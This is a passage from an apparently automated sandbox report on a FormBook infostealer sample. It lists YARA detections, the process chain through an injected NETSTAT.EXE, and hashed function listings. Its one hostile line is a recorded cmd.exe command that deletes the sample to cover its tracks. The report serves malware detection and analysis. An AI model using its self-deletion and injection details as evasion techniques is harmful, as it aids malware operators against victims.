                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: NETSTAT.EXE PID: 4812 Parent PID: 3424

                                          General

                                          Start time:09:56:53
                                          Start date:03/10/2021
                                          Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                          Imagebase:0x830000
                                          File size:32768 bytes
                                          MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          Chronological Activities

                                          Analysis Process: cmd.exe PID: 6880 Parent PID: 4812

                                          General

                                          Start time:09:56:58
                                          Start date:03/10/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\OApfyh3Vfm.exe'
                                          Imagebase:0x11d0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: conhost.exe PID: 6120 Parent PID: 6880

                                          General

                                          Start time:09:56:58
                                          Start date:03/10/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Disassembly

                                          Code Analysis

                                          Reset < >

                                            Analysis Process: OApfyh3Vfm.exe PID: 6332 Parent PID: 5944 OApfyh3Vfm.exeCOMMON

                                            Executed Functions

                                            Function 057508D8, Relevance: .2, Instructions: 228COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 637c0a435b412f3203a15b41b8a14a9d7cc5e5e4c1532aafeed2237d7d7b1005
                                            • Instruction ID: e371db6546d4e92a17a1151c9c3040d14a4ca795c5bdeb13381c801e02ea8b61
                                            • Opcode Fuzzy Hash: 637c0a435b412f3203a15b41b8a14a9d7cc5e5e4c1532aafeed2237d7d7b1005
                                            • Instruction Fuzzy Hash: CFA1E374D05209CFEB14CFAAC488AEEFBF2BF49324F14902AD809A7245DB749985DF54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C7B6A0, Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 00C7B710
                                            • GetCurrentThread.KERNEL32 ref: 00C7B74D
                                            • GetCurrentProcess.KERNEL32 ref: 00C7B78A
                                            • GetCurrentThreadId.KERNEL32 ref: 00C7B7E3
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 848fee89d5139c8892e51dd19d79e5110ae3a2fa2956e00f23d41e7afb5dcea5
                                            • Instruction ID: 6b7378240d7dc06b3f530d8d3fd99096992323ac8cd8786baaa5daa2a4c41114
                                            • Opcode Fuzzy Hash: 848fee89d5139c8892e51dd19d79e5110ae3a2fa2956e00f23d41e7afb5dcea5
                                            • Instruction Fuzzy Hash: 8B5153B09006498FDB14CFAAD589BEEBBF0BF88314F24845AE419A7360CB749944CF65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C7B6B0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 00C7B710
                                            • GetCurrentThread.KERNEL32 ref: 00C7B74D
                                            • GetCurrentProcess.KERNEL32 ref: 00C7B78A
                                            • GetCurrentThreadId.KERNEL32 ref: 00C7B7E3
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: d0d61db898719625c1e7f36fcd2624b7398c26c3ae52b339e9ae63a4622458b3
                                            • Instruction ID: c289e4fef644666403e576815fa6eaeb5abb24236d4347686aa816cea50fedbf
                                            • Opcode Fuzzy Hash: d0d61db898719625c1e7f36fcd2624b7398c26c3ae52b339e9ae63a4622458b3
                                            • Instruction Fuzzy Hash: 625142B0D006498FDB14CFAAD589BEEBBF0BF88314F248459E419A7360CB74A944CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C796B0, Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00C798F6
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: b52b9a1e557d78f7895da383b85ee501ea8514328652630171e1b3e26a632724
                                            • Instruction ID: 34cef937233e38754b29a7764c81fa2f638d71a76ca06297f0f2fb4908d372cd
                                            • Opcode Fuzzy Hash: b52b9a1e557d78f7895da383b85ee501ea8514328652630171e1b3e26a632724
                                            • Instruction Fuzzy Hash: 23812370A00B058FDB24DF2AD04579ABBF1FF88304F108A2ED49ADBA50DB75E9058B91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C7FD0C, Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C7FE2A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: ddbe2428a8806369cac3d907fc495b82554beec25ece95af9773ee6189d3716a
                                            • Instruction ID: 2b5a5c2f2a42b676a089eedea1d28f3c3a90969f94d0f1c594be41b270b6d0b8
                                            • Opcode Fuzzy Hash: ddbe2428a8806369cac3d907fc495b82554beec25ece95af9773ee6189d3716a
                                            • Instruction Fuzzy Hash: 8851C2B1D003489FDB14CFAAD884ADEBBB5BF48314F24812EE419AB251D7749946CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C7FD18, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C7FE2A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 866c1b3f218179fbca455837d9037bfc82504fe084d0765ef71722e4c80582b9
                                            • Instruction ID: 6951a80731543abad75f37892ffd051ac91f4a52b0e3c3fa33abbddddb018343
                                            • Opcode Fuzzy Hash: 866c1b3f218179fbca455837d9037bfc82504fe084d0765ef71722e4c80582b9
                                            • Instruction Fuzzy Hash: E44191B1D00309DFDB14CFAAD884ADEBBB5BF48314F24812EE419AB251D7749945CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C7536D, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00C75429
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 68b661b69ea199cb543f6b0fb98d5b40e12ecb3d8098259f858a86f0ad1d3329
                                            • Instruction ID: 8894bfaf4c39618443be9be4ae51c0e2be2538f34163b48ae69b1b960fe9ea84
                                            • Opcode Fuzzy Hash: 68b661b69ea199cb543f6b0fb98d5b40e12ecb3d8098259f858a86f0ad1d3329
                                            • Instruction Fuzzy Hash: 5B41F371D04618CFDB24CFAAC8847DEBBB5BF88304F25806AD419AB251DB755946CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C73E08, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00C75429
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 3c2fdd790d2d0099b0f47971546c33fa5dedc5d02f700856f18c542700247266
                                            • Instruction ID: 9a496b43720fa3e0da71b7edecdc7c0cb713eec59540ba870b5b94c0c9d7a48c
                                            • Opcode Fuzzy Hash: 3c2fdd790d2d0099b0f47971546c33fa5dedc5d02f700856f18c542700247266
                                            • Instruction Fuzzy Hash: 6341F1B0C0461CCBDB24CFAAC884BDEBBF5BF48304F258069D519AB251DBB56945CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C79928, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00C798F6
                                              • Part of subcall function 00C792C8: LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C79971,00000800,00000000,00000000), ref: 00C79B82
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: HandleLibraryLoadModule
                                            • String ID:
                                            • API String ID: 4133054770-0
                                            • Opcode ID: fbbf2374226afa5d98522408cd290b0ff34351938560a3eea032487f4d37a6c4
                                            • Instruction ID: bfaf21de63123d6c92da18064494a811bcc45c16b97ae0cc8cd82dd6eeb739bc
                                            • Opcode Fuzzy Hash: fbbf2374226afa5d98522408cd290b0ff34351938560a3eea032487f4d37a6c4
                                            • Instruction Fuzzy Hash: B321E471A042449FDB10DBA9E8407EABBB5EF86320F14846ED55DE7252CA35980ACB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C7B8D0, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C7B95F
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: fd5cd4b9e10c7d0efa4332b17c6951c88da4889088de72dd3e39663473eca9bc
                                            • Instruction ID: fff84c7accb3b535b3238e62916735f0fb513c73f9b7153189b5942ac4d8cb49
                                            • Opcode Fuzzy Hash: fd5cd4b9e10c7d0efa4332b17c6951c88da4889088de72dd3e39663473eca9bc
                                            • Instruction Fuzzy Hash: A321E3B5900248AFDB10CFA9E584AEEBBF4EB48324F24801AE954B7350C778A945CF60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C7B8D8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C7B95F
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: ff6f2c2d291fdfe5101b0a2503ff9b1ca1caf974ebfbddcd5b30d6328e43ec28
                                            • Instruction ID: c17db933c720abbcad9e9e68f424c724be0cb57d0f1b5e2e4d01d5b5fff059f7
                                            • Opcode Fuzzy Hash: ff6f2c2d291fdfe5101b0a2503ff9b1ca1caf974ebfbddcd5b30d6328e43ec28
                                            • Instruction Fuzzy Hash: 3321C4B5900259EFDB10CFA9D984ADEBBF8FB48324F14841AE954B3350D774A944CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C792C8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C79971,00000800,00000000,00000000), ref: 00C79B82
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: af7c8718c0b551b8de6f57b2c1b810cb227a604178c80dc192e5e10071ace66e
                                            • Instruction ID: 4a00f4f8f1c35a91d806005c269b6bb951f8fdd34255665ccbd7b9e81b9cbd95
                                            • Opcode Fuzzy Hash: af7c8718c0b551b8de6f57b2c1b810cb227a604178c80dc192e5e10071ace66e
                                            • Instruction Fuzzy Hash: A21103B29002488FCB20CF9AD444ADEBBF8EB88324F14842EE519A7200C774A945CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C79B12, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C79971,00000800,00000000,00000000), ref: 00C79B82
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 0753ce9433f4a552514ef0c5ff8e48adcc001b97620eaf912b7c1934ccf0d8d3
                                            • Instruction ID: 9d1975474a5de48e4c02f34cb09a77d319f1c9651047bbb31fca55f387f55131
                                            • Opcode Fuzzy Hash: 0753ce9433f4a552514ef0c5ff8e48adcc001b97620eaf912b7c1934ccf0d8d3
                                            • Instruction Fuzzy Hash: 791106B29002498FDB20CFAAD444ADEFBF4EB88324F14841ED459A7600C778A546CFA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C79890, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00C798F6
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677095030.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 196ca1419d573df5616a5a3514185f98006011437ada7086351b75623ed0c4b5
                                            • Instruction ID: 447f8bba8b225f188043621b38180531a9577fd75c8469a34180881d4eecf7ee
                                            • Opcode Fuzzy Hash: 196ca1419d573df5616a5a3514185f98006011437ada7086351b75623ed0c4b5
                                            • Instruction Fuzzy Hash: 6D110FB1D006498FCB10CF9AD444ADEFBF8EF89324F14841AD429B7610C378A545CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 057599D0, Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: $,l
                                            • API String ID: 0-2092904771
                                            • Opcode ID: 0e143cd0437a275585da9cd20b6d33a2b10556b86643ce3c9c1c9ff6702901c2
                                            • Instruction ID: e3b3fb15aac61bdca408c9c5aaf655eb5bf9319b9414611f1e66193c099cfbf3
                                            • Opcode Fuzzy Hash: 0e143cd0437a275585da9cd20b6d33a2b10556b86643ce3c9c1c9ff6702901c2
                                            • Instruction Fuzzy Hash: B8212430E00209CBCB04CFEAD4446EFBBF6EB89224F148529C904B3254EB309941CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05759B50, Relevance: .1, Instructions: 78COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: df0c7f2d4da66a401568497cc44d915ff497418667d3b023d208c8ec962dd485
                                            • Instruction ID: 714945d8871310ce4dd4352fd0bc58539d02d88788456d77c91ecd27115db459
                                            • Opcode Fuzzy Hash: df0c7f2d4da66a401568497cc44d915ff497418667d3b023d208c8ec962dd485
                                            • Instruction Fuzzy Hash: B6314970E04209CFDB54DFAAD4856EEFBF2BB88314F1085A9C905A7244D7789981DF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 008ED4C4, Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.676989152.00000000008ED000.00000040.00000001.sdmp, Offset: 008ED000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e0076ee9ff74c035b92c1d7770e28394122df840568ed8b4dd228e4bca1b6c75
                                            • Instruction ID: 316b42afc34b835ca9d32d1a9c1dc3d6fa740c7ce066e783d93b931d032eea26
                                            • Opcode Fuzzy Hash: e0076ee9ff74c035b92c1d7770e28394122df840568ed8b4dd228e4bca1b6c75
                                            • Instruction Fuzzy Hash: 562137B2504384DFDB01DF14D9C0B26BF65FB8832CF24C569E8058B246C336D84ACBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 008ED3D8, Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.676989152.00000000008ED000.00000040.00000001.sdmp, Offset: 008ED000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e7db6772e5581e7dc0e9bfb9e961709f6c808b60008b302decc5cff772200d4f
                                            • Instruction ID: f2e12140643f69eac4ed05fed36588f95ec95019eb983adba55f92d37d6fb447
                                            • Opcode Fuzzy Hash: e7db6772e5581e7dc0e9bfb9e961709f6c808b60008b302decc5cff772200d4f
                                            • Instruction Fuzzy Hash: BF213AB1504384DFDB01DF14D9C0B26BBA5FBA532CF24C569E9098B286C336EC4AC7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00ADD01C, Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677034066.0000000000ADD000.00000040.00000001.sdmp, Offset: 00ADD000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d56942b52e15f7685aa6d45829b147ab1a7309ff345faf3b04142508b55a3b27
                                            • Instruction ID: 6862c7eea7cfdd371efd7a90fe56c4a6d68f90e4bd726c89cc5c0e53c61a7e91
                                            • Opcode Fuzzy Hash: d56942b52e15f7685aa6d45829b147ab1a7309ff345faf3b04142508b55a3b27
                                            • Instruction Fuzzy Hash: EC21F2B5504240EFDB14DF24D8C4B26BBA5FB88314F24C96AD80B4B346C736DC47CA61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00ADD1D4, Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677034066.0000000000ADD000.00000040.00000001.sdmp, Offset: 00ADD000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 53cbcdb4c2666496f0466b58d3987c10fa4b4cc76902b8c83b35c4c1fbb2619a
                                            • Instruction ID: b57f817df5b35c1c77c7f9dd201ab4dbbc2ada53c27705bdec211984bf1a93a6
                                            • Opcode Fuzzy Hash: 53cbcdb4c2666496f0466b58d3987c10fa4b4cc76902b8c83b35c4c1fbb2619a
                                            • Instruction Fuzzy Hash: A421F2B1904240EFDB01DF64D9C0BA6BBB5FB84314F24CA6EE84A4B346C736D846CA61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00ADD005, Relevance: .1, Instructions: 60COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677034066.0000000000ADD000.00000040.00000001.sdmp, Offset: 00ADD000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: edb48bc587531f60388730ecbd49f17ed31abbd650ae0e671904d85a9835b271
                                            • Instruction ID: d25ff3f3bd1323111fb23a968683acc094e20167980d47fe5d93720a8391f5ca
                                            • Opcode Fuzzy Hash: edb48bc587531f60388730ecbd49f17ed31abbd650ae0e671904d85a9835b271
                                            • Instruction Fuzzy Hash: 6B2192755093C08FCB12CF24D994715BF71EB86314F28C6DBD84A8B657C33A980ACB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 008ED3D3, Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.676989152.00000000008ED000.00000040.00000001.sdmp, Offset: 008ED000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 917a5ae3d983fd734d8602945f9d5328e8532b02038ce25639f7386fa4c58ab9
                                            • Instruction ID: 9227351accc119245bdd46bad9250525b739c5d0bc459bad44f98fb2ad1ea73d
                                            • Opcode Fuzzy Hash: 917a5ae3d983fd734d8602945f9d5328e8532b02038ce25639f7386fa4c58ab9
                                            • Instruction Fuzzy Hash: 7411D376404380DFDB11CF14D5C4B16BF71FB95324F24C6A9D8094B656C33AE85ACBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 008ED4BF, Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.676989152.00000000008ED000.00000040.00000001.sdmp, Offset: 008ED000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 917a5ae3d983fd734d8602945f9d5328e8532b02038ce25639f7386fa4c58ab9
                                            • Instruction ID: bd26b7b5dd31a31a57dafb6ad0ac2157a3170f44272ad4c9f0dd31012beb27de
                                            • Opcode Fuzzy Hash: 917a5ae3d983fd734d8602945f9d5328e8532b02038ce25639f7386fa4c58ab9
                                            • Instruction Fuzzy Hash: DD11D376804380DFCB11CF14D9C4B16BF71FB85324F24C6A9D8454B616C336D85ACBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0575F5F8, Relevance: .1, Instructions: 54COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 82fb8ed7303befe3638002917a27e8a27846fbc7db057775855949a1bb198e48
                                            • Instruction ID: 32f48f63f1470d7872f203ea9d57a06f366653ec800cfd9df5025bfb6fea2517
                                            • Opcode Fuzzy Hash: 82fb8ed7303befe3638002917a27e8a27846fbc7db057775855949a1bb198e48
                                            • Instruction Fuzzy Hash: 0221D3B4D00219DFDB04DFAAC9456AEBBF2FF88311F10816AC808A3254E7748A81DF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00ADD1CF, Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.677034066.0000000000ADD000.00000040.00000001.sdmp, Offset: 00ADD000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: de1ca536cd1c41e12caa75795dfdbee05fb5903b243fce9bc442825e70aaeb29
                                            • Instruction ID: fbe5f50047ae425d9ac562d4eb95755df4a29fda59d079aca95abd126fb4837c
                                            • Opcode Fuzzy Hash: de1ca536cd1c41e12caa75795dfdbee05fb5903b243fce9bc442825e70aaeb29
                                            • Instruction Fuzzy Hash: BD118B75904280DFDB11CF14D5C4B55FBB1FB84324F28C6AAD84A4B756C33AD84ACB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05752804, Relevance: .1, Instructions: 52COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce6c9fda441b3b9861fadd76f20c2a742e2234c6440b5052f93fbdb9862d998d
                                            • Instruction ID: be4a996508f57fbce90837e92cb72c2d5257b5dfd25aa5d8e7f66ff809966bbe
                                            • Opcode Fuzzy Hash: ce6c9fda441b3b9861fadd76f20c2a742e2234c6440b5052f93fbdb9862d998d
                                            • Instruction Fuzzy Hash: 10214974A00328CFEB50EF65D888B9DBBB2FB04305F1095A9D809DB268DB349D85DF00
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0575268E, Relevance: .1, Instructions: 51COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8337ac4a86d76473e75ead297dba508bf48a3ebdf02e1a8c6583d6e380ab519b
                                            • Instruction ID: c1ab5a0550db71073203002b73af40fe6618075a51f11f20fa76b2a4209c8be1
                                            • Opcode Fuzzy Hash: 8337ac4a86d76473e75ead297dba508bf48a3ebdf02e1a8c6583d6e380ab519b
                                            • Instruction Fuzzy Hash: 9D214874D00229CFDB60DF64D888BADB7B1FB08311F1085A9D80AA7258DB345E85DF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05752931, Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.682390786.0000000005750000.00000040.00000001.sdmp, Offset: 05750000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8622bcfac04b13a902ce4a32e5a08b13005a0c951d847cc4609f558c12334c4e
                                            • Instruction ID: 7bbe6d99d5fc311681bd0ee73cbcb611cfa8ec6be67651d617a525909e7b97a1
